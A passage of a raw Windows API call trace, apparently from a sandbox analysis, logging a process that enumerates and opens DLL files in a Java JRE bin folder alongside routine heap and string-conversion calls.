lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.317] AreFileApisANSI () returned 1 [0091.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll", lpUsedDefaultChar=0x0) returned 63 [0091.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0091.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0091.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0091.317] AreFileApisANSI () returned 1 [0091.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0091.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6ebe0 [0091.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 63 [0091.317] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.318] GetFileType (hFile=0x360) returned 0x1 [0091.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0091.318] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.318] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.318] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.318] CloseHandle (hObject=0x360) returned 1 [0091.318] AreFileApisANSI () returned 1 [0091.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0091.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e1c8 [0091.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 63 [0091.319] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.319] GetFileType (hFile=0x360) returned 0x1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0091.319] CloseHandle (hObject=0x360) returned 1 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0091.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0091.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.320] AreFileApisANSI () returned 1 [0091.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6de98 [0091.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6de98, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll") returned 63 [0091.320] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JAWTAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jawtaccessbridge-64.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3c40)) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0091.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.320] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x31440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jdwp.dll", cAlternateFileName="")) returned 1 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0091.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0091.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.321] AreFileApisANSI () returned 1 [0091.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll", lpUsedDefaultChar=0x0) returned 48 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0091.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0091.321] AreFileApisANSI () returned 1 [0091.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.322] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0091.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 48 [0091.322] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.323] GetFileType (hFile=0x360) returned 0x1 [0091.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0091.323] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0091.323] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0091.323] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0091.323] CloseHandle (hObject=0x360) returned 1 [0091.324] AreFileApisANSI () returned 1 [0091.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0091.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 48 [0091.324] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0091.324] GetFileType (hFile=0x360) returned 0x1 [0091.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0091.324] CloseHandle (hObject=0x360) returned 1 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.325] AreFileApisANSI () returned 1 [0091.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0091.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll") returned 48 [0091.325] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jdwp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jdwp.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x31440)) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.325] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.325] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa747934d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa747934d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa747934d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6840, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jfr.dll", cAlternateFileName="")) returned 1 [0091.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0091.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0091.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0091.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0091.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0091.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.326] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0091.326] AreFileApisANSI () returned 1 [0091.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jfr.dll", lpUsedDefaultChar=0x0) returned 47 [0091.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0091.326] InitOnceExecuteOnce (in: 